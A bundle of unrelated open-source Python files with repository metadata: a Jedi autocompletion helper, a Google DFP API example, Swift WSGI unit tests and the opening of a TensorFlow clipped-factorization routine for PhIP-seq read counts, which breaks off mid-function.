:arg variable: ``<variable>`` part in ``from ... import <variable>``
:type alias: str
:arg alias: ``<alias>`` part in ``... import ... as <alias>``.
:rtype: :class:`parsing_representation.Import`
"""
submodule = self.scope._sub_module
if variable:
varname = pr.Name(
module=submodule,
names=[(variable, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
varname = None
modname = pr.Name(
module=submodule,
names=[(module, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
if alias:
aliasname = pr.Name(
module=submodule,
names=[(alias, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
aliasname = None
if varname:
fakeimport = pr.Import(
module=submodule,
namespace=varname,
from_ns=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
else:
fakeimport = pr.Import(
module=submodule,
namespace=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
return fakeimport
def make_fakestatement(self, lhs, rhs, call=False):
"""
Make a fake statement object that represents ``lhs = rhs``.
:type call: bool
:arg call: When `call` is true, make a fake statement that represents
``lhs = rhs()``.
:rtype: :class:`parsing_representation.Statement`
"""
submodule = self.scope._sub_module
lhsname = pr.Name(
module=submodule,
names=[(lhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
rhsname = pr.Name(
module=submodule,
names=[(rhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
token_list = [lhsname, (tokenize.OP, '=', (0, 0)), rhsname]
if call:
token_list.extend([
(tokenize.OP, '(', (0, 0)),
(tokenize.OP, ')', (0, 0)),
])
return pr.Statement(
module=submodule,
token_list=token_list,
start_pos=(0, 0),
end_pos=(None, None))
|
{
"content_hash": "c0e91dfc045ba5db993925ff959863de",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 78,
"avg_line_length": 32.27218934911242,
"alnum_prop": 0.5031169783645031,
"repo_name": "leonth/private-configs",
"id": "dadf1b28c8dbcc174e4515b8a1f4b60ca93fcbbf",
"size": "5454",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sublime-text-3/Packages/Jedi - Python autocompletion/jedi/interpret.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1370403"
},
{
"name": "Shell",
"bytes": "1449"
}
],
"symlink_target": ""
}
|
"""This code example gets a line item creative association (LICA) by the line
item and creative id. To determine which line items exist, run
get_all_line_items.py. To determine which creatives exit, run
get_all_creatives.py."""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
lica_service = client.GetService(
'LineItemCreativeAssociationService', version='v201204')
# Set line item and creative id to use to retrieve the LICA.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
creative_id = 'INSERT_CREATIVE_ID_HERE'
# Get LICA.
lica = lica_service.GetLineItemCreativeAssociation(line_item_id, creative_id)[0]
# Display results.
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['lineItemId'], lica['creativeId'],
lica['status']))
|
{
"content_hash": "a36caf14f9ef5e36066ea6e0e2fa2372",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 80,
"avg_line_length": 35.4,
"alnum_prop": 0.6908797417271993,
"repo_name": "krux/adspygoogle",
"id": "c3d900c13a14d55456fb2482af26c793738b4ee9",
"size": "1857",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/adspygoogle/dfp/v201204/get_lica.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "10581"
},
{
"name": "Python",
"bytes": "2263332"
}
],
"symlink_target": ""
}
|
""" Tests for swift.common.wsgi """
from __future__ import with_statement
import errno
import logging
import mimetools
import socket
import unittest
import os
import re
import pickle
from textwrap import dedent
from gzip import GzipFile
from StringIO import StringIO
from collections import defaultdict
from contextlib import contextmanager, closing
from urllib import quote
from tempfile import mkstemp
from eventlet import listen
import swift
from swift.common.swob import Request
from swift.common import wsgi, utils, ring
from test.unit import temptree
from mock import patch
def _fake_rings(tmpdir):
with closing(GzipFile(os.path.join(tmpdir, 'account.ring.gz'), 'wb')) as f:
pickle.dump(ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
[{'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6012},
{'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6022}], 30),
f)
with closing(GzipFile(os.path.join(tmpdir, 'container.ring.gz'), 'wb')) as f:
pickle.dump(ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
[{'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6011},
{'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6021}], 30),
f)
with closing(GzipFile(os.path.join(tmpdir, 'object.ring.gz'), 'wb')) as f:
pickle.dump(ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
[{'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6010},
{'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6020}], 30),
f)
class TestWSGI(unittest.TestCase):
""" Tests for swift.common.wsgi """
def setUp(self):
utils.HASH_PATH_PREFIX = 'startcap'
self._orig_parsetype = mimetools.Message.parsetype
def tearDown(self):
mimetools.Message.parsetype = self._orig_parsetype
def test_monkey_patch_mimetools(self):
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).type, 'text/plain')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).plisttext, '')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).maintype, 'text')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).subtype, 'plain')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).type, 'text/html')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).plisttext,
'; charset=ISO-8859-4')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).maintype, 'text')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).subtype, 'html')
wsgi.monkey_patch_mimetools()
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).type, None)
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).plisttext, '')
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).maintype, None)
sio = StringIO('blah')
self.assertEquals(mimetools.Message(sio).subtype, None)
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).type, 'text/html')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).plisttext,
'; charset=ISO-8859-4')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).maintype, 'text')
sio = StringIO('Content-Type: text/html; charset=ISO-8859-4')
self.assertEquals(mimetools.Message(sio).subtype, 'html')
def test_init_request_processor(self):
config = """
[DEFAULT]
swift_dir = TEMPDIR
[pipeline:main]
pipeline = catch_errors proxy-server
[app:proxy-server]
use = egg:swift#proxy
conn_timeout = 0.2
[filter:catch_errors]
use = egg:swift#catch_errors
"""
contents = dedent(config)
with temptree(['proxy-server.conf']) as t:
conf_file = os.path.join(t, 'proxy-server.conf')
with open(conf_file, 'w') as f:
f.write(contents.replace('TEMPDIR', t))
_fake_rings(t)
app, conf, logger, log_name = wsgi.init_request_processor(
conf_file, 'proxy-server')
# verify pipeline is catch_errors -> proxy-server
expected = swift.common.middleware.catch_errors.CatchErrorMiddleware
self.assert_(isinstance(app, expected))
self.assert_(isinstance(app.app, swift.proxy.server.Application))
# config settings applied to app instance
self.assertEquals(0.2, app.app.conn_timeout)
# appconfig returns values from 'proxy-server' section
expected = {
'__file__': conf_file,
'here': os.path.dirname(conf_file),
'conn_timeout': '0.2',
'swift_dir': t,
}
self.assertEquals(expected, conf)
# logger works
logger.info('testing')
self.assertEquals('proxy-server', log_name)
def test_init_request_processor_from_conf_dir(self):
config_dir = {
'proxy-server.conf.d/pipeline.conf': """
[pipeline:main]
pipeline = catch_errors proxy-server
""",
'proxy-server.conf.d/app.conf': """
[app:proxy-server]
use = egg:swift#proxy
conn_timeout = 0.2
""",
'proxy-server.conf.d/catch-errors.conf': """
[filter:catch_errors]
use = egg:swift#catch_errors
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as conf_root:
conf_dir = os.path.join(conf_root, 'proxy-server.conf.d')
with open(os.path.join(conf_dir, 'swift.conf'), 'w') as f:
f.write('[DEFAULT]\nswift_dir = %s' % conf_root)
_fake_rings(conf_root)
app, conf, logger, log_name = wsgi.init_request_processor(
conf_dir, 'proxy-server')
# verify pipeline is catch_errors -> proxy-server
expected = swift.common.middleware.catch_errors.CatchErrorMiddleware
self.assert_(isinstance(app, expected))
self.assert_(isinstance(app.app, swift.proxy.server.Application))
# config settings applied to app instance
self.assertEquals(0.2, app.app.conn_timeout)
# appconfig returns values from 'proxy-server' section
expected = {
'__file__': conf_dir,
'here': conf_dir,
'conn_timeout': '0.2',
'dynamic_pipelines': 'False',
'swift_dir': conf_root,
}
self.assertEquals(expected, conf)
# logger works
logger.info('testing')
self.assertEquals('proxy-server', log_name)
def test_init_request_processor_with_dynamic_pipeline(self):
config_dir = {
'proxy-server.conf.d/pipeline.conf': """
[DEFAULT]
dynamic_pipelines: True
[pipeline:main]
pipeline = tempauth proxy-server
""",
'proxy-server.conf.d/app.conf': """
[app:proxy-server]
use = egg:swift#proxy
""",
'proxy-server.conf.d/catch-errors.conf': """
[filter:catch_errors]
use = egg:swift#catch_errors
pipeline = main
before = #start healthcheck
""",
'proxy-server.conf.d/others.conf': """
[filter:tempauth]
use = egg:swift#tempauth
[filter:keystone]
use = egg:swift#keystoneauth
before = tempauth proxy-server
pipeline = main
[filter:healthcheck]
use = egg:swift#healthcheck
before = #start
pipeline = main
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as conf_root:
conf_dir = os.path.join(conf_root, 'proxy-server.conf.d')
with open(os.path.join(conf_dir, 'swift.conf'), 'w') as f:
f.write('[DEFAULT]\nswift_dir = %s' % conf_root)
_fake_rings(conf_root)
app, conf, logger, log_name = wsgi.init_request_processor(
conf_dir, 'proxy-server')
# verify pipeline
def get_pipeline(app):
yield app
while hasattr(app, 'app'):
app = app.app
yield app
def get_pipeline_class_names(app):
for ware in get_pipeline(app):
yield ware.__class__.__name__
expected_classnames = [
'CatchErrorMiddleware',
'HealthCheckMiddleware',
'KeystoneAuth',
'TempAuth',
'Application']
pipeline_classnames = list(get_pipeline_class_names(app))
self.assertEquals(expected_classnames, pipeline_classnames)
def test_get_socket(self):
# stubs
conf = {}
ssl_conf = {
'cert_file': '',
'key_file': '',
}
# mocks
class MockSocket():
def __init__(self):
self.opts = defaultdict(dict)
def setsockopt(self, level, optname, value):
self.opts[level][optname] = value
def mock_listen(*args, **kwargs):
return MockSocket()
class MockSsl():
def __init__(self):
self.wrap_socket_called = []
def wrap_socket(self, sock, **kwargs):
self.wrap_socket_called.append(kwargs)
return sock
# patch
old_listen = wsgi.listen
old_ssl = wsgi.ssl
try:
wsgi.listen = mock_listen
wsgi.ssl = MockSsl()
# test
sock = wsgi.get_socket(conf)
# assert
self.assert_(isinstance(sock, MockSocket))
expected_socket_opts = {
socket.SOL_SOCKET: {
socket.SO_REUSEADDR: 1,
socket.SO_KEEPALIVE: 1,
},
}
if hasattr(socket, 'TCP_KEEPIDLE'):
expected_socket_opts[socket.IPPROTO_TCP] = {
socket.TCP_KEEPIDLE: 600,
}
self.assertEquals(sock.opts, expected_socket_opts)
# test ssl
sock = wsgi.get_socket(ssl_conf)
expected_kwargs = {
'certfile': '',
'keyfile': '',
}
self.assertEquals(wsgi.ssl.wrap_socket_called, [expected_kwargs])
finally:
wsgi.listen = old_listen
wsgi.ssl = old_ssl
def test_address_in_use(self):
# stubs
conf = {}
# mocks
def mock_listen(*args, **kwargs):
raise socket.error(errno.EADDRINUSE)
def value_error_listen(*args, **kwargs):
raise ValueError('fake')
def mock_sleep(*args):
pass
class MockTime():
"""Fast clock advances 10 seconds after every call to time
"""
def __init__(self):
self.current_time = old_time.time()
def time(self, *args, **kwargs):
rv = self.current_time
# advance for next call
self.current_time += 10
return rv
old_listen = wsgi.listen
old_sleep = wsgi.sleep
old_time = wsgi.time
try:
wsgi.listen = mock_listen
wsgi.sleep = mock_sleep
wsgi.time = MockTime()
# test error
self.assertRaises(Exception, wsgi.get_socket, conf)
# different error
wsgi.listen = value_error_listen
self.assertRaises(ValueError, wsgi.get_socket, conf)
finally:
wsgi.listen = old_listen
wsgi.sleep = old_sleep
wsgi.time = old_time
def test_run_server(self):
config = """
[DEFAULT]
eventlet_debug = yes
client_timeout = 30
max_clients = 1000
swift_dir = TEMPDIR
[pipeline:main]
pipeline = proxy-server
[app:proxy-server]
use = egg:swift#proxy
# while "set" values normally override default
set client_timeout = 20
# this section is not in conf during run_server
set max_clients = 10
"""
contents = dedent(config)
with temptree(['proxy-server.conf']) as t:
conf_file = os.path.join(t, 'proxy-server.conf')
with open(conf_file, 'w') as f:
f.write(contents.replace('TEMPDIR', t))
_fake_rings(t)
with patch('swift.common.wsgi.wsgi') as _wsgi:
with patch('swift.common.wsgi.eventlet') as _eventlet:
conf = wsgi.appconfig(conf_file)
logger = logging.getLogger('test')
sock = listen(('localhost', 0))
wsgi.run_server(conf, logger, sock)
self.assertEquals('HTTP/1.0',
_wsgi.HttpProtocol.default_request_version)
self.assertEquals(30, _wsgi.WRITE_TIMEOUT)
_eventlet.hubs.use_hub.assert_called_with(utils.get_hub())
_eventlet.patcher.monkey_patch.assert_called_with(all=False,
socket=True)
_eventlet.debug.hub_exceptions.assert_called_with(True)
_wsgi.server.assert_called()
args, kwargs = _wsgi.server.call_args
server_sock, server_app, server_logger = args
self.assertEquals(sock, server_sock)
self.assert_(isinstance(server_app, swift.proxy.server.Application))
self.assertEquals(20, server_app.client_timeout)
self.assert_(isinstance(server_logger, wsgi.NullLogger))
self.assert_('custom_pool' in kwargs)
self.assertEquals(1000, kwargs['custom_pool'].size)
def test_run_server_conf_dir(self):
config_dir = {
'proxy-server.conf.d/pipeline.conf': """
[pipeline:main]
pipeline = proxy-server
""",
'proxy-server.conf.d/app.conf': """
[app:proxy-server]
use = egg:swift#proxy
""",
'proxy-server.conf.d/default.conf': """
[DEFAULT]
eventlet_debug = yes
client_timeout = 30
"""
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as conf_root:
conf_dir = os.path.join(conf_root, 'proxy-server.conf.d')
with open(os.path.join(conf_dir, 'swift.conf'), 'w') as f:
f.write('[DEFAULT]\nswift_dir = %s' % conf_root)
_fake_rings(conf_root)
with patch('swift.common.wsgi.wsgi') as _wsgi:
with patch('swift.common.wsgi.eventlet') as _eventlet:
with patch.dict('os.environ', {'TZ': ''}):
conf = wsgi.appconfig(conf_dir)
logger = logging.getLogger('test')
sock = listen(('localhost', 0))
wsgi.run_server(conf, logger, sock)
self.assert_(os.environ['TZ'] is not '')
self.assertEquals('HTTP/1.0',
_wsgi.HttpProtocol.default_request_version)
self.assertEquals(30, _wsgi.WRITE_TIMEOUT)
_eventlet.hubs.use_hub.assert_called_with(utils.get_hub())
_eventlet.patcher.monkey_patch.assert_called_with(all=False,
socket=True)
_eventlet.debug.hub_exceptions.assert_called_with(True)
_wsgi.server.assert_called()
args, kwargs = _wsgi.server.call_args
server_sock, server_app, server_logger = args
self.assertEquals(sock, server_sock)
self.assert_(isinstance(server_app, swift.proxy.server.Application))
self.assert_(isinstance(server_logger, wsgi.NullLogger))
self.assert_('custom_pool' in kwargs)
def test_appconfig_dir_ignores_hidden_files(self):
config_dir = {
'server.conf.d/01.conf': """
[app:main]
use = egg:swift#proxy
port = 8080
""",
'server.conf.d/.01.conf.swp': """
[app:main]
use = egg:swift#proxy
port = 8081
""",
}
# strip indent from test config contents
config_dir = dict((f, dedent(c)) for (f, c) in config_dir.items())
with temptree(*zip(*config_dir.items())) as path:
conf_dir = os.path.join(path, 'server.conf.d')
conf = wsgi.appconfig(conf_dir)
expected = {
'__file__': os.path.join(path, 'server.conf.d'),
'here': os.path.join(path, 'server.conf.d'),
'dynamic_pipelines': 'False',
'port': '8080',
}
self.assertEquals(conf, expected)
def test_pre_auth_wsgi_input(self):
oldenv = {}
newenv = wsgi.make_pre_authed_env(oldenv)
self.assertTrue('wsgi.input' in newenv)
self.assertEquals(newenv['wsgi.input'].read(), '')
oldenv = {'wsgi.input': StringIO('original wsgi.input')}
newenv = wsgi.make_pre_authed_env(oldenv)
self.assertTrue('wsgi.input' in newenv)
self.assertEquals(newenv['wsgi.input'].read(), '')
oldenv = {'swift.source': 'UT'}
newenv = wsgi.make_pre_authed_env(oldenv)
self.assertEquals(newenv['swift.source'], 'UT')
oldenv = {'swift.source': 'UT'}
newenv = wsgi.make_pre_authed_env(oldenv, swift_source='SA')
self.assertEquals(newenv['swift.source'], 'SA')
def test_pre_auth_req(self):
class FakeReq(object):
@classmethod
def fake_blank(cls, path, environ={}, body='', headers={}):
self.assertEquals(environ['swift.authorize']('test'), None)
self.assertFalse('HTTP_X_TRANS_ID' in environ)
was_blank = Request.blank
Request.blank = FakeReq.fake_blank
wsgi.make_pre_authed_request({'HTTP_X_TRANS_ID': '1234'},
'PUT', '/', body='tester', headers={})
wsgi.make_pre_authed_request({'HTTP_X_TRANS_ID': '1234'},
'PUT', '/', headers={})
Request.blank = was_blank
def test_pre_auth_req_with_quoted_path(self):
r = wsgi.make_pre_authed_request(
{'HTTP_X_TRANS_ID': '1234'}, 'PUT', path=quote('/a space'),
body='tester', headers={})
self.assertEquals(r.path, quote('/a space'))
def test_pre_auth_req_drops_query(self):
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path')
self.assertEquals(r.query_string, 'original')
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path?replacement')
self.assertEquals(r.query_string, 'replacement')
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path?')
self.assertEquals(r.query_string, '')
def test_pre_auth_req_with_body(self):
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path', 'the body')
self.assertEquals(r.body, 'the body')
def test_pre_auth_creates_script_name(self):
e = wsgi.make_pre_authed_env({})
self.assertTrue('SCRIPT_NAME' in e)
def test_pre_auth_copies_script_name(self):
e = wsgi.make_pre_authed_env({'SCRIPT_NAME': '/script_name'})
self.assertEquals(e['SCRIPT_NAME'], '/script_name')
def test_pre_auth_copies_script_name_unless_path_overridden(self):
e = wsgi.make_pre_authed_env({'SCRIPT_NAME': '/script_name'},
path='/override')
self.assertEquals(e['SCRIPT_NAME'], '')
self.assertEquals(e['PATH_INFO'], '/override')
def test_pre_auth_req_swift_source(self):
r = wsgi.make_pre_authed_request(
{'QUERY_STRING': 'original'}, 'GET', 'path', 'the body',
swift_source='UT')
self.assertEquals(r.body, 'the body')
self.assertEquals(r.environ['swift.source'], 'UT')
def test_pre_auth_req_with_empty_env_no_path(self):
r = wsgi.make_pre_authed_request(
{}, 'GET')
self.assertEquals(r.path, quote(''))
self.assertTrue('SCRIPT_NAME' in r.environ)
self.assertTrue('PATH_INFO' in r.environ)
def test_pre_auth_req_with_env_path(self):
r = wsgi.make_pre_authed_request(
{'PATH_INFO': '/unquoted path with %20'}, 'GET')
self.assertEquals(r.path, quote('/unquoted path with %20'))
self.assertEquals(r.environ['SCRIPT_NAME'], '')
def test_pre_auth_req_with_env_script(self):
r = wsgi.make_pre_authed_request({'SCRIPT_NAME': '/hello'}, 'GET')
self.assertEquals(r.path, quote('/hello'))
def test_pre_auth_req_with_env_path_and_script(self):
env = {'PATH_INFO': '/unquoted path with %20',
'SCRIPT_NAME': '/script'}
r = wsgi.make_pre_authed_request(env, 'GET')
expected_path = quote(env['SCRIPT_NAME'] + env['PATH_INFO'])
self.assertEquals(r.path, expected_path)
env = {'PATH_INFO': '', 'SCRIPT_NAME': '/script'}
r = wsgi.make_pre_authed_request(env, 'GET')
self.assertEquals(r.path, '/script')
env = {'PATH_INFO': '/path', 'SCRIPT_NAME': ''}
r = wsgi.make_pre_authed_request(env, 'GET')
self.assertEquals(r.path, '/path')
env = {'PATH_INFO': '', 'SCRIPT_NAME': ''}
r = wsgi.make_pre_authed_request(env, 'GET')
self.assertEquals(r.path, '')
def test_pre_auth_req_path_overrides_env(self):
env = {'PATH_INFO': '/path', 'SCRIPT_NAME': '/script'}
r = wsgi.make_pre_authed_request(env, 'GET', '/override')
self.assertEquals(r.path, '/override')
self.assertEquals(r.environ['SCRIPT_NAME'], '')
self.assertEquals(r.environ['PATH_INFO'], '/override')
class TestWSGIContext(unittest.TestCase):
def test_app_call(self):
statuses = ['200 Ok', '404 Not Found']
def app(env, start_response):
start_response(statuses.pop(0), [('Content-Length', '3')])
yield 'Ok\n'
wc = wsgi.WSGIContext(app)
r = Request.blank('/')
it = wc._app_call(r.environ)
self.assertEquals(wc._response_status, '200 Ok')
self.assertEquals(''.join(it), 'Ok\n')
r = Request.blank('/')
it = wc._app_call(r.environ)
self.assertEquals(wc._response_status, '404 Not Found')
self.assertEquals(''.join(it), 'Ok\n')
@contextmanager
def temp_config(contents):
fd, fn = mkstemp()
with temptree(['proxy-server.conf']) as t:
conf_dir = os.path.join(t, 'proxy-server.conf.d')
os.mkdir(conf_dir)
conf_file = os.path.join(conf_dir, 'default.conf')
with open(conf_file, 'w') as f:
f.write(contents)
f.close()
loader = wsgi.ConfigDirLoader(conf_dir)
yield loader.parser
class TestConfigParsing(unittest.TestCase):
def setUp(self):
self.basic_config = dedent("""
[DEFAULT]
dynamic_pipelines: True
[pipeline:main]
pipeline = catch_errors proxy-server
[app:proxy-server]
use = egg:swift#proxy
conn_timeout = 0.2
[filter:catch_errors]
use = egg:swift#catch_errors
""")
def test_basic_interpolation(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:attheend]
pipeline = main
after = between
[filter:between]
pipeline = main
before = proxy-server
after = catch_errors
[filter:atthestart]
pipeline = main
before = catch_errors
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'atthestart catch_errors between attheend proxy-server'
self.assertEquals(expected, pipeline)
def test_provides(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:kerberos]
pipeline = main
provides = authentication
before = proxy-server provides:authorization
after = catch_errors
[filter:ldap]
pipeline = main
provides = authorization
before = proxy-server
after = provides:authentication catch_errors
[filter:coffee]
pipeline = main
provides = java
before = provides:authentication provides:authorization
after = catch_errors
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'catch_errors coffee kerberos ldap proxy-server'
self.assertEquals(expected, pipeline)
def test_nonexistent_constraints(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:deluded]
pipeline = main
before = doesnotexist
after = provides:nonexistent
[filter:fool]
pipeline = main
provides = authorization
before = imaginary, figmental
after = illusive; fictional; hallucinatory
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = set(['catch_errors', 'proxy-server', 'deluded', 'fool'])
actual = set(re.split('\s+', pipeline))
self.assertEquals(expected, actual)
def test_multiple_pipelines(self):
config_text = dedent(self.basic_config) + dedent("""
[composite:superproxy]
use = egg:swift#superproxy
[pipeline:secondary]
pipeline = process_successes superproxy
[pipeline:shouldbeignored]
pipeline = proxy-server
[filter:shortbus]
pipeline = main
after = catch_errors process_successes
before = proxy-server superproxy
[filter:amalgamut]
pipeline = main secondary
before = catch_errors process_successes
[filter:not_present_in_a_pipeline]
before = catch_errors
[filter:targets_a_nonexistent_pipeline]
pipeline = doesnotexist
before = catch_errors
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'amalgamut catch_errors shortbus proxy-server'
self.assertEquals(expected, pipeline)
pipeline = config.get('pipeline:secondary', 'pipeline')
expected = 'amalgamut process_successes superproxy'
self.assertEquals(expected, pipeline)
pipeline = config.get('pipeline:shouldbeignored', 'pipeline')
self.assertEquals('proxy-server', pipeline)
def test_special_symbols(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:early]
pipeline = main
provides = authentication
before = #start
[filter:yet-earlier]
pipeline = main
provides = authentication
before = #start early
[filter:late]
pipeline = main
provides = authorization
after = #end
[filter:yet-later]
pipeline = main
after = #end
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:main', 'pipeline')
expected = 'yet-earlier early catch_errors ' + \
'late yet-later proxy-server'
self.assertEquals(expected, pipeline)
def test_duplicate_items(self):
config_text = dedent(self.basic_config) + dedent("""
[pipeline:duplicates]
pipeline = filtera filterb filtera filterb proxy-server
[filter:filtera]
pipeline = duplicates
[filter:filterb]
pipeline = duplicates
""")
with temp_config(config_text) as config:
pipeline = config.get('pipeline:duplicates', 'pipeline')
expected = 'filtera filterb filtera filterb proxy-server'
self.assertEquals(expected, pipeline)
def test_nothing_goes_after_app(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:after_app]
pipeline = main
after = proxy-server
""")
try:
with temp_config(config_text) as config:
pass
except Exception as e:
self.assertEquals(wsgi.ConfigFileError, e.__class__)
def test_must_have_static_pipeline(self):
config_text = dedent(self.basic_config) + dedent("""
[pipeline:empty]
[app:proxy-server]
pipeline = empty
[filter:filtera]
pipeline = empty
after = proxy-server
""")
try:
with temp_config(config_text) as config:
pass
except Exception as e:
self.assertEquals(wsgi.ConfigFileError, e.__class__)
def test_circular_dependencies(self):
config_text = dedent(self.basic_config) + dedent("""
[filter:filter1]
pipeline = main
after = catch_errors
[filter:filter2]
pipeline = main
before = catch_errors
after = filter1
""")
try:
with temp_config(config_text) as config:
pass
except Exception as e:
self.assertEquals(wsgi.ConfigFileError, e.__class__)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "867c4ea7740cab3e0f0940e0f9cc8f38",
"timestamp": "",
"source": "github",
"line_count": 847,
"max_line_length": 81,
"avg_line_length": 36.78512396694215,
"alnum_prop": 0.5465545463298778,
"repo_name": "orion/swift-config",
"id": "6dd5ef39e130ed544056b526dea4c092ab51fa83",
"size": "31742",
"binary": false,
"copies": "1",
"ref": "refs/heads/dynamic-pipeline",
"path": "test/unit/common/test_wsgi.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "15048"
},
{
"name": "Python",
"bytes": "3063773"
},
{
"name": "Shell",
"bytes": "685"
}
],
"symlink_target": ""
}
|
import time
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow.contrib.distributions import percentile
def do_clipped_factorization(
counts_df,
rank=3,
clip_percentile=99.9,
learning_rate=1.0,
minibatch_size=1024 * 32,
patience=5,
max_epochs=1000,
normalize_to_reads_per_million=True,
log_every_seconds=10,
):
"""
Attempt to detect and correct for clone and sample batch effects by
subtracting off a learned low-rank reconstruction of the counts matrix.
The return value is the clones x samples matrix of residuals after
correcting for batch effects, with a few additional rows and columns giving
the learned background effects.
Implements the factorization:
X = AB
where X is (clones x samples), A is (clones x rank), and B is
(rank x samples)
by minimizing the "clipped" loss:
||minimum(X - AB, percentile(X - AB, clip_percentile)||_2 + unclipped
The minimum is taken elementwise, and ||...||_2 is the Frobenius norm.
clip_percentile is a parameter giving the percentile to clip at. The
clipping makes the factorization robust to outliers, some of which are
likely phip-seq hits.
If the above is optimized without an `unclipped` term, a few phage clones
may have all of their residuals above the truncation threshold. Once this
happens they will likely stay stuck there since they do not contribute to
the gradient. The unclipped term fixes this by providing a small nudge
toward smaller errors without truncation.
Note that "beads-only" samples are not treated in any special way here.
The optimization is performed using stochastic gradient descent (SGD) on
tensorflow.
Parameters
----------
counts_df : pandas.DataFrame
Matrix of read counts (clones x samples)
rank : int
Rank of low-dimensional background effect matrices A and B
clip_percentile : float
Elements with reconstruction errors above this percentile do not
contribute to the gradient. Aim for a lower-bound on the fraction
of entries you expect NOT to be hits.
learning_rate : float
SGD optimizer learning rate
minibatch_size : int
Number of rows per SGD minibatch
patience : int
Number of epochs without improvement in training loss to tolerate before
stopping
max_epochs : int
Maximum number of epochs
normalize_to_reads_per_million : boolean
Before computing factorization, first divide each column by the total
number of reads for that sample and multiple by 1 million.
log_every_seconds : float
Seconds to wait before printing another optimization status update
Returns
-------
pandas.DataFrame : residuals after correcting for batch effects
In addition to the clones x samples residuals, rows and columns named
"_background_0", "_background_1", ... giving the learned background vectors
are also included.
"""
# Non-tf setup
if normalize_to_reads_per_million:
observed = (counts_df * 1e6 / counts_df.sum(0)).astype("float32")
else:
observed = counts_df.astype("float32")
(n, s) = observed.shape
if len(counts_df) < minibatch_size:
minibatch_size = len(counts_df)
# Placeholders
target = tf.placeholder(name="target", dtype="float32", shape=[None, s])
minibatch_indices = tf.placeholder(name="minibatch_indices", dtype="int32")
# Variables
a = tf.Variable(np.random.rand(n, rank), name="A", dtype="float32")
b = tf.Variable(np.random.rand(rank, s), name="B", dtype="float32")
clip_threshold = tf.Variable(observed.max().max())
# Derived quantities
reconstruction = tf.matmul(tf.gather(a, minibatch_indices), b)
differences = target - reconstruction
